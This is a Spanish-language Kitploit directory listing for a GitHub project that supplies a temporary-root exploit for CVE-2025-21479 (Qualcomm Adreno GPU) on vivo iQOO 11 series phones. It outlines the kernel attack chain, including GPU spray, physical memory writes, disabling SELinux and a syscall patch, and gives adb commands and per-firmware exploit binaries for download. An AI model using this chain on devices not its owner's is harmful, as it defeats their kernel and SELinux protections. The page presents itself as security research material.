Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-21479-iqoo11pro — Notas de reproducción de CVE-2025-21479 (GPU Qualcomm Adreno) para vivo iQOO 11 Pro (PD2254) - investigación autorizada | Kitploit
Herramientas/GitHubGitHub/xianwan1314/cve-2025-21479-iqoo11pro
Seguridad AndroidEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónSeguridad MóvilSeguridad de HardwareDesarrollo de PayloadsExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubxianwan1314/cve-2025-21479-iqoo11pro

cve-2025-21479-iqoo11pro

Notas de reproducción de CVE-2025-21479 (GPU Qualcomm Adreno) para vivo iQOO 11 Pro (PD2254) - investigación autorizada

Ver Repositorio
121hace 20 díasAún no revisado

CVE-2025-21479 Root temporal (serie iQOO 11)

Versión

ElementoValor
Dispositivovivo iQOO 11 Pro (PD2254 / V2254A)
SistemaAndroid 15, PD2254B_A_15.2.12.2.W10
Kernel5.15.178-g3dc7c01077b8-dirty
SoCSnapdragon 8 Gen 2 (SM8550 / kalama)
GPUAdreno 740, OpenGL ES 3.2 [email protected]

Modelos compatibles

Debido a las limitaciones del método actual, no se ha implementado la extracción de kallsyms en tiempo de ejecución, por lo que, aparte de las tres versiones anteriores, teóricamente ninguna otra versión es compatible.

Proyectos de referencia

  • zhuowei/cheese (Quest 3/3S, Adreno 740)
  • ma4the/omae-wa-cheese-da (Galaxy Z Flip5, SM8550/Adreno 740 v675)

Flujo de implementación

root@kitploit:~
GPU spray (secuestro de tablas de páginas SMMU, 27 direcciones físicas candidatas)
  → lectura/escritura arbitraria de memoria física
  → SELinux enforcing → permissive (escritura física de selinux_state)
  → patch __arm64_sys_vhangup (syscall #58, no invocado por Android)
      GPU escribe directamente un stub de 96 bytes (commit_creds(prepare_kernel_cred(NULL)))
  → fork proceso hijo → syscall(58) → uid=0
  → setexeccon: escribir /proc/self/attr/exec = "u:r:shell:s0"
  → exec root shell (uid=0, dominio = u:r:shell:s0)

Ejecución:

root@kitploit:~
adb push exploit /data/local/tmp/exploit
adb shell
chmod 755 /data/local/tmp/exploit
cd /data/local/tmp && ./exploit

Ejemplo de implementación

Gestión de permisos Root:

root@kitploit:~
find /data/app -type d | grep resukisu
/data/app/***/***/lib/arm64/libksud.so insmod kernelsu.ko

Notas

  • Root temporal: solo tiene efecto en la shell actual; al salir, vuelva a ejecutar el exploit para escalar privilegios
  • El GPU spray es un proceso probabilístico; puede fallar si el estado del dispositivo es deficiente; reinicie el dispositivo y vuelva a intentarlo
  • Solo es aplicable al firmware Android 15 de la lista de modelos compatibles; otras versiones no han sido verificadas

Descargo de responsabilidad

Este proyecto está destinado únicamente a fines de investigación de seguridad y aprendizaje; realice las pruebas solo en dispositivos de su propiedad. El usuario asume toda la responsabilidad por las consecuencias derivadas del uso de este proyecto, incluyendo, entre otras, daños al dispositivo, pérdida de datos, etc. No utilice este proyecto para ningún fin ilegal.

Descargar herramienta
ModeloFirmwareKernelBinario
iQOO 11 Pro (PD2254)PD2254B_A_15.2.12.2.W105.15.178-g3dc7c01077b8-dirtyexploit_11pro
iQOO 11s (PD2304)PD2304B_A_15.2.12.1.W105.15.178-g844f85161cd7-dirtyexploit_11s
iQOO 11 (PD2243)PD2243B_A_15.2.16.1.W105.15.178-g0ae61da50a34-dirtyexploit_11